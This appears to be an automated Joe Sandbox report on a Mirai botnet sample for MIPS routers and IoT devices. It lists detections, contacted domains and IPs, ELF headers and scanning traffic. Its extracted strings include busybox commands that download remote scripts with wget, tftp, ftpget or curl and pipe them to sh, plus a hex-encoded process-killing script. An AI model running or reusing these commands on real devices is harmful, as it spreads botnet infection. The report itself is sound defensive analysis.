Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
hmips.elf

Overview

General Information

Sample name:hmips.elf
Analysis ID:1579200
MD5:40fa65794e145a61bc34ce27581f9fca
SHA1:c7d7a8f9f26394dfc4d6be2a05ba5e0d0cfaa91d
SHA256:d02adfd870363610aa7d7862c1627639f7688b7ffaa51f363dd3588cad104b2d
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579200
Start date and time:2024-12-21 04:26:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 56s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:hmips.elf
Detection:MAL
Classification:mal72.troj.linELF@0/0@69/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/hmips.elf
PID:6240
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
I just wanna look after my cats, man.
Standard Error:
  • system is lnxubuntu20
  • hmips.elf (PID: 6240, Parent: 6165, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/hmips.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
hmips.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: hmips.elfAvira: detected
        Source: hmips.elfReversingLabs: Detection: 39%
        Source: hmips.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

        Networking

        barindex
        Source: global trafficTCP traffic: 86.107.100.19 ports 20665,0,2,5,6,9209
        Source: global trafficDNS traffic detected: malformed DNS query: catvision.dyn. [malformed]
        Source: global trafficDNS traffic detected: malformed DNS query: hikvision.geek. [malformed]
        Source: global trafficDNS traffic detected: malformed DNS query: catlovingfools.geek. [malformed]
        Source: global trafficDNS traffic detected: malformed DNS query: shitrocket.dyn. [malformed]
        Source: global trafficTCP traffic: 192.168.2.23:51294 -> 86.107.100.19:20665
        Source: global trafficTCP traffic: 192.168.2.23:40680 -> 185.72.8.231:2383
        Source: global trafficTCP traffic: 192.168.2.23:54152 -> 80.78.26.121:2383
        Source: global trafficTCP traffic: 192.168.2.23:43438 -> 212.60.5.153:5522
        Source: global trafficTCP traffic: 192.168.2.23:48188 -> 176.32.32.113:22126
        Source: global trafficTCP traffic: 192.168.2.23:56450 -> 212.192.13.95:16377
        Source: /tmp/hmips.elf (PID: 6240)Socket: 127.0.0.1:1172
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 120.224.93.115
        Source: unknownTCP traffic detected without corresponding DNS query: 62.166.115.166
        Source: unknownTCP traffic detected without corresponding DNS query: 62.6.168.44
        Source: unknownTCP traffic detected without corresponding DNS query: 142.119.152.81
        Source: unknownTCP traffic detected without corresponding DNS query: 11.42.56.192
        Source: unknownTCP traffic detected without corresponding DNS query: 62.196.90.63
        Source: unknownTCP traffic detected without corresponding DNS query: 119.86.34.158
        Source: unknownTCP traffic detected without corresponding DNS query: 154.129.141.96
        Source: unknownTCP traffic detected without corresponding DNS query: 66.82.186.198
        Source: unknownTCP traffic detected without corresponding DNS query: 111.252.80.55
        Source: unknownTCP traffic detected without corresponding DNS query: 34.173.174.163
        Source: unknownTCP traffic detected without corresponding DNS query: 46.193.69.189
        Source: unknownTCP traffic detected without corresponding DNS query: 164.136.33.219
        Source: unknownTCP traffic detected without corresponding DNS query: 182.57.234.110
        Source: unknownTCP traffic detected without corresponding DNS query: 31.250.118.146
        Source: unknownTCP traffic detected without corresponding DNS query: 45.176.93.125
        Source: unknownTCP traffic detected without corresponding DNS query: 174.130.139.50
        Source: unknownTCP traffic detected without corresponding DNS query: 65.111.149.151
        Source: unknownTCP traffic detected without corresponding DNS query: 15.248.79.16
        Source: unknownTCP traffic detected without corresponding DNS query: 71.77.221.78
        Source: unknownTCP traffic detected without corresponding DNS query: 167.114.136.244
        Source: unknownTCP traffic detected without corresponding DNS query: 174.157.249.17
        Source: unknownTCP traffic detected without corresponding DNS query: 217.2.170.5
        Source: unknownTCP traffic detected without corresponding DNS query: 68.231.152.164
        Source: unknownTCP traffic detected without corresponding DNS query: 209.49.174.176
        Source: unknownTCP traffic detected without corresponding DNS query: 120.224.93.115
        Source: unknownTCP traffic detected without corresponding DNS query: 176.166.134.254
        Source: unknownTCP traffic detected without corresponding DNS query: 62.166.115.166
        Source: unknownTCP traffic detected without corresponding DNS query: 104.1.238.242
        Source: unknownTCP traffic detected without corresponding DNS query: 62.6.168.44
        Source: unknownTCP traffic detected without corresponding DNS query: 27.28.57.171
        Source: unknownTCP traffic detected without corresponding DNS query: 142.119.152.81
        Source: unknownTCP traffic detected without corresponding DNS query: 11.42.56.192
        Source: unknownTCP traffic detected without corresponding DNS query: 28.211.63.80
        Source: unknownTCP traffic detected without corresponding DNS query: 145.81.142.101
        Source: unknownTCP traffic detected without corresponding DNS query: 153.9.186.174
        Source: unknownTCP traffic detected without corresponding DNS query: 144.68.49.216
        Source: unknownTCP traffic detected without corresponding DNS query: 40.143.23.203
        Source: unknownTCP traffic detected without corresponding DNS query: 208.90.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 175.85.215.224
        Source: unknownTCP traffic detected without corresponding DNS query: 61.184.163.149
        Source: unknownTCP traffic detected without corresponding DNS query: 157.87.70.85
        Source: unknownTCP traffic detected without corresponding DNS query: 54.160.157.32
        Source: unknownTCP traffic detected without corresponding DNS query: 23.15.229.91
        Source: unknownTCP traffic detected without corresponding DNS query: 75.178.106.170
        Source: unknownTCP traffic detected without corresponding DNS query: 18.96.200.187
        Source: unknownTCP traffic detected without corresponding DNS query: 167.29.60.142
        Source: unknownTCP traffic detected without corresponding DNS query: 40.36.238.144
        Source: unknownTCP traffic detected without corresponding DNS query: 39.107.215.89
        Source: global trafficDNS traffic detected: DNS query: shitrocket.dyn
        Source: global trafficDNS traffic detected: DNS query: hikvision.geek
        Source: global trafficDNS traffic detected: DNS query: catlovingfools.geek
        Source: global trafficDNS traffic detected: DNS query: catvision.dyn. [malformed]
        Source: global trafficDNS traffic detected: DNS query: hikvision.geek. [malformed]
        Source: global trafficDNS traffic detected: DNS query: catlovingfools.geek. [malformed]
        Source: global trafficDNS traffic detected: DNS query: shitrocket.dyn. [malformed]
        Source: hmips.elfString found in binary or memory: http:///curl.sh
        Source: hmips.elfString found in binary or memory: http:///wget.sh
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: usage: busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname Kamru
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
        Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
        Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./Galaxy selfrep
        Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
        Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./Galaxy selfrepI just wanna look/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mpslppcspcsh4
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal72.troj.linELF@0/0@69/0
        Source: /tmp/hmips.elf (PID: 6240)Queries kernel information via 'uname':
        Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf
        Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmpBinary or memory string: ^U!/usr/bin/vmtoolsd
        Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmpBinary or memory string: ^U!/etc/qemu-binfmt/mips
        Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: hmips.elf, type: SAMPLE
        Source: Yara matchFile source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: hmips.elf, type: SAMPLE
        Source: Yara matchFile source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        Path InterceptionDirect Volume AccessOS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579200 Sample: hmips.elf Startdate: 21/12/2024 Architecture: LINUX Score: 72 26 shitrocket.dyn. [malformed] 2->26 28 hikvision.geek. [malformed] 2->28 30 105 other IPs or domains 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected Mirai 2->36 38 Connects to many ports of the same IP (likely port scanning) 2->38 10 hmips.elf 2->10         started        signatures3 40 Sends malformed DNS queries 28->40 process4 process5 12 hmips.elf 10->12         started        14 hmips.elf 10->14         started        process6 16 hmips.elf 12->16         started        18 hmips.elf 14->18         started        process7 20 hmips.elf 16->20         started        22 hmips.elf 18->22         started        process8 24 hmips.elf 20->24         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        hmips.elf39%ReversingLabsLinux.Backdoor.Mirai
        hmips.elf100%AviraEXP/ELF.Agent.J.8
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        shitrocket.dyn
        212.60.5.153
        truefalse
          high
          catlovingfools.geek
          185.72.8.231
          truefalse
            high
            hikvision.geek
            185.72.8.231
            truefalse
              high
              catlovingfools.geek. [malformed]
              unknown
              unknownfalse
                high
                hikvision.geek. [malformed]
                unknown
                unknownfalse
                  high
                  shitrocket.dyn. [malformed]
                  unknown
                  unknownfalse
                    high
                    catvision.dyn. [malformed]
                    unknown
                    unknownfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http:///wget.shhmips.elffalse
                        high
                        http:///curl.shhmips.elffalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          61.248.201.68
                          unknownKorea Republic of
                          3786LGDACOMLGDACOMCorporationKRfalse
                          158.111.69.119
                          unknownUnited States
                          13611CDCUSfalse
                          92.243.22.79
                          unknownFrance
                          203476GANDI-AS-2Domainnameregistrar-httpwwwgandinetFRfalse
                          59.101.152.237
                          unknownAustralia
                          2764AAPTAAPTLimitedAUfalse
                          147.175.228.70
                          unknownSlovakia (SLOVAK Republic)
                          2607SANETSlovakAcademicNetworkSKfalse
                          55.84.215.193
                          unknownUnited States
                          351DNIC-ASBLK-00306-00371USfalse
                          185.230.47.158
                          unknownUkraine
                          205692WEBINVESTPLUSUAfalse
                          28.13.247.181
                          unknownUnited States
                          7922COMCAST-7922USfalse
                          84.194.149.212
                          unknownBelgium
                          6848TELENET-ASBEfalse
                          101.102.207.29
                          unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                          78.91.104.110
                          unknownNorway
                          224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
                          54.185.230.168
                          unknownUnited States
                          16509AMAZON-02USfalse
                          188.138.99.78
                          unknownGermany
                          8972GD-EMEA-DC-SXB1DEfalse
                          217.238.216.22
                          unknownGermany
                          3320DTAGInternetserviceprovideroperationsDEfalse
                          4.39.172.234
                          unknownUnited States
                          46164ATT-MOBILITY-LABSUSfalse
                          77.181.19.192
                          unknownGermany
                          6805TDDE-ASN1DEfalse
                          191.123.132.141
                          unknownBrazil
                          26615TIMSABRfalse
                          129.93.247.90
                          unknownUnited States
                          7896NU-ASUSfalse
                          199.33.240.31
                          unknownUnited States
                          7782ALSK-7782USfalse
                          205.51.55.180
                          unknownUnited States
                          2914NTT-COMMUNICATIONS-2914USfalse
                          157.151.4.253
                          unknownUnited States
                          23342UNITEDLAYERUSfalse
                          196.170.87.186
                          unknownTogo
                          24691TOGOTEL-ASTogoTelecomTogoTGfalse
                          206.209.124.186
                          unknownUnited States
                          23548THEDACAREUSfalse
                          211.17.244.132
                          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                          132.66.186.162
                          unknownIsrael
                          378MACHBA-ASILANILfalse
                          166.87.167.210
                          unknownSaudi Arabia
                          5080ARAMCO-ASUSfalse
                          75.128.235.161
                          unknownUnited States
                          20115CHARTER-20115USfalse
                          145.224.25.238
                          unknownUnited Kingdom
                          1101IP-EEND-ASIP-EENDBVNLfalse
                          30.236.150.145
                          unknownUnited States
                          7922COMCAST-7922USfalse
                          121.237.234.92
                          unknownChina
                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                          22.238.114.140
                          unknownUnited States
                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          63.41.135.162
                          unknownUnited States
                          22394CELLCOUSfalse
                          203.241.214.22
                          unknownKorea Republic of
                          18401AS18401-AS-KRDAEGUUNIVERSITYKRfalse
                          220.20.108.56
                          unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                          109.142.223.115
                          unknownBelgium
                          5432PROXIMUS-ISP-ASBEfalse
                          211.160.25.151
                          unknownChina
                          9814FIBRLINKBeijingFibrLINKNetworksCoLtdCNfalse
                          60.105.182.252
                          unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                          183.19.27.115
                          unknownChina
                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                          209.248.243.232
                          unknownUnited States
                          7029WINDSTREAMUSfalse
                          90.221.106.17
                          unknownUnited Kingdom
                          5607BSKYB-BROADBAND-ASGBfalse
                          223.98.57.231
                          unknownChina
                          24444CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompanyfalse
                          66.9.20.10
                          unknownUnited States
                          18885M2NGAGE2USfalse
                          170.101.226.66
                          unknownSaudi Arabia
                          25019SAUDINETSTC-ASSAfalse
                          175.23.41.204
                          unknownChina
                          4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                          131.110.72.47
                          unknownUnited States
                          6BULL-HNUSfalse
                          143.225.102.51
                          unknownItaly
                          137ASGARRConsortiumGARREUfalse
                          156.60.232.255
                          unknownUnited States
                          1226CTA-42-AS1226USfalse
                          206.64.5.124
                          unknownUnited States
                          701UUNETUSfalse
                          64.79.82.146
                          unknownUnited States
                          10297ENET-2USfalse
                          146.211.79.112
                          unknownFinland
                          16086DNAFIfalse
                          24.66.153.15
                          unknownCanada
                          6327SHAWCAfalse
                          58.12.166.205
                          unknownJapan17506UCOMARTERIANetworksCorporationJPfalse
                          54.54.164.172
                          unknownUnited States
                          14618AMAZON-AESUSfalse
                          49.30.181.29
                          unknownKorea Republic of
                          4766KIXS-AS-KRKoreaTelecomKRfalse
                          167.12.63.91
                          unknownUnited States
                          3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
                          137.27.163.26
                          unknownUnited States
                          20115CHARTER-20115USfalse
                          146.20.121.237
                          unknownUnited States
                          27357RACKSPACEUSfalse
                          38.207.37.102
                          unknownUnited States
                          9009M247GBfalse
                          74.100.71.79
                          unknownUnited States
                          701UUNETUSfalse
                          73.105.156.45
                          unknownUnited States
                          7922COMCAST-7922USfalse
                          36.50.14.16
                          unknownunknown
                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                          37.206.42.120
                          unknownItaly
                          3269ASN-IBSNAZITfalse
                          115.244.44.165
                          unknownIndia
                          55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                          156.214.15.151
                          unknownEgypt
                          8452TE-ASTE-ASEGfalse
                          175.108.110.197
                          unknownJapan2516KDDIKDDICORPORATIONJPfalse
                          101.219.236.184
                          unknownIndia
                          58519CHINATELECOM-CTCLOUDCloudComputingCorporationCNfalse
                          78.170.19.203
                          unknownTurkey
                          9121TTNETTRfalse
                          108.78.15.60
                          unknownUnited States
                          7018ATT-INTERNET4USfalse
                          209.92.151.127
                          unknownUnited States
                          7029WINDSTREAMUSfalse
                          161.177.38.22
                          unknownUnited States
                          10695WAL-MARTUSfalse
                          6.117.134.75
                          unknownUnited States
                          3356LEVEL3USfalse
                          78.61.93.100
                          unknownLithuania
                          8764TELIA-LIETUVALTfalse
                          146.225.111.145
                          unknownUnited States
                          25400TELIA-NORWAY-ASTeliaNorwayCoreNetworksNOfalse
                          30.210.187.13
                          unknownUnited States
                          7922COMCAST-7922USfalse
                          153.203.223.211
                          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                          150.179.157.247
                          unknownUnited States
                          3479PEACHNET-AS1USfalse
                          99.218.40.105
                          unknownCanada
                          812ROGERS-COMMUNICATIONSCAfalse
                          40.99.98.3
                          unknownUnited States
                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          201.3.136.151
                          unknownBrazil
                          8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                          58.65.191.39
                          unknownPakistan
                          23674NAYATEL-PKNayatelPvtLtdPKfalse
                          61.26.182.226
                          unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
                          201.143.209.15
                          unknownMexico
                          8151UninetSAdeCVMXfalse
                          124.65.32.115
                          unknownChina
                          4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                          142.17.208.176
                          unknownCanada
                          611NECN-1-611CAfalse
                          213.85.209.25
                          unknownRussian Federation
                          8615CNT-ASMoscowRussiaRUfalse
                          166.180.68.254
                          unknownUnited States
                          22394CELLCOUSfalse
                          37.248.66.142
                          unknownPoland
                          8374PLUSNETPlusnetworkoperatorinPolandPLfalse
                          94.244.131.127
                          unknownUkraine
                          34743NASHNET-ASKievUkraineUAfalse
                          5.36.68.138
                          unknownOman
                          28885OMANTEL-NAP-ASOmanTelNAPOMfalse
                          136.48.74.228
                          unknownUnited States
                          16591GOOGLE-FIBERUSfalse
                          204.16.157.87
                          unknownUnited States
                          30686LVLT-30686USfalse
                          86.55.160.189
                          unknownIran (ISLAMIC Republic Of)
                          197207MCCI-ASIRfalse
                          183.9.56.218
                          unknownChina
                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                          121.231.38.194
                          unknownChina
                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                          132.193.131.201
                          unknownUnited States
                          668DNIC-AS-00668USfalse
                          31.59.195.66
                          unknownIran (ISLAMIC Republic Of)
                          31549RASANAIRfalse
                          26.227.137.255
                          unknownUnited States
                          7922COMCAST-7922USfalse
                          135.33.140.90
                          unknownUnited States
                          54614CIKTELECOM-CABLECAfalse
                          135.174.27.80
                          unknownUnited States
                          14962NCR-252USfalse
                          142.176.248.215
                          unknownCanada
                          855CANET-ASN-4CAfalse
                          No context
                          No context
                          No context
                          No context
                          No context
                          No created / dropped files found
                          File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                          Entropy (8bit):5.546117135531765
                          TrID:
                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                          File name:hmips.elf
                          File size:89'408 bytes
                          MD5:40fa65794e145a61bc34ce27581f9fca
                          SHA1:c7d7a8f9f26394dfc4d6be2a05ba5e0d0cfaa91d
                          SHA256:d02adfd870363610aa7d7862c1627639f7688b7ffaa51f363dd3588cad104b2d
                          SHA512:c4d234cb037089769b82aaa424be73f1d31ff403197d5ecc705de3f88f8d17bb1ffee5e0597c6ff5d63d3db0b5cb4febfb3412baac1940197fbbe0efab62ed02
                          SSDEEP:1536:PjRdrJyhVuqVuIWu30rJfLueVqCHyOUeE3k1XPSni8VRw/TPm:1dFyWfLcCSO1XPSnid/TO
                          TLSH:E793D71E6E71AFADF778C33447774A30A7A863C126E18686D2BCE5101E2034D685FBE4
                          File Content Preview:.ELF.....................@.`...4..[......4. ...(.............@...@....M...M...............P..EP..EP.......\H........dt.Q............................<...'......!'.......................<...'......!... ....'9... ......................<...'......!........'9+

                          ELF header

                          Class:ELF32
                          Data:2's complement, big endian
                          Version:1 (current)
                          Machine:MIPS R3000
                          Version Number:0x1
                          Type:EXEC (Executable file)
                          OS/ABI:UNIX - System V
                          ABI Version:0
                          Entry Point Address:0x400260
                          Flags:0x1007
                          ELF Header Size:52
                          Program Header Offset:52
                          Program Header Size:32
                          Number of Program Headers:3
                          Section Header Offset:88848
                          Section Header Size:40
                          Number of Section Headers:14
                          Header String Table Index:13
                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                          NULL0x00x00x00x00x0000
                          .initPROGBITS0x4000940x940x8c0x00x6AX004
                          .textPROGBITS0x4001200x1200x12b300x00x6AX0016
                          .finiPROGBITS0x412c500x12c500x5c0x00x6AX004
                          .rodataPROGBITS0x412cb00x12cb00x21000x00x2A0016
                          .ctorsPROGBITS0x4550000x150000x80x00x3WA004
                          .dtorsPROGBITS0x4550080x150080x80x00x3WA004
                          .data.rel.roPROGBITS0x4550140x150140xdc0x00x3WA004
                          .dataPROGBITS0x4550f00x150f00x3c80x00x3WA0016
                          .gotPROGBITS0x4554c00x154c00x5ec0x40x10000003WAp0016
                          .sbssNOBITS0x455aac0x15aac0x280x00x10000003WAp004
                          .bssNOBITS0x455ae00x15aac0x51680x00x3WA0016
                          .mdebug.abi32PROGBITS0xc4e0x15aac0x00x00x0001
                          .shstrtabSTRTAB0x00x15aac0x640x00x0001
                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                          LOAD0x00x4000000x4000000x14db00x14db05.60890x5R E0x10000.init .text .fini .rodata
                          LOAD0x150000x4550000x4550000xaac0x5c483.72450x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 21, 2024 04:26:54.261223078 CET43928443192.168.2.2391.189.91.42
                          Dec 21, 2024 04:26:55.429908037 CET3881023192.168.2.23120.224.93.115
                          Dec 21, 2024 04:26:55.430830002 CET4061623192.168.2.2362.166.115.166
                          Dec 21, 2024 04:26:55.431493998 CET4229023192.168.2.2362.6.168.44
                          Dec 21, 2024 04:26:55.432117939 CET5040423192.168.2.23142.119.152.81
                          Dec 21, 2024 04:26:55.432729959 CET3507223192.168.2.2311.42.56.192
                          Dec 21, 2024 04:26:55.457331896 CET4242823192.168.2.2362.196.90.63
                          Dec 21, 2024 04:26:55.505192995 CET3509623192.168.2.23119.86.34.158
                          Dec 21, 2024 04:26:55.506745100 CET3424223192.168.2.23154.129.141.96
                          Dec 21, 2024 04:26:55.508044004 CET4727823192.168.2.2366.82.186.198
                          Dec 21, 2024 04:26:55.508879900 CET5273423192.168.2.23111.252.80.55
                          Dec 21, 2024 04:26:55.509354115 CET5513623192.168.2.2334.173.174.163
                          Dec 21, 2024 04:26:55.509826899 CET3544623192.168.2.2346.193.69.189
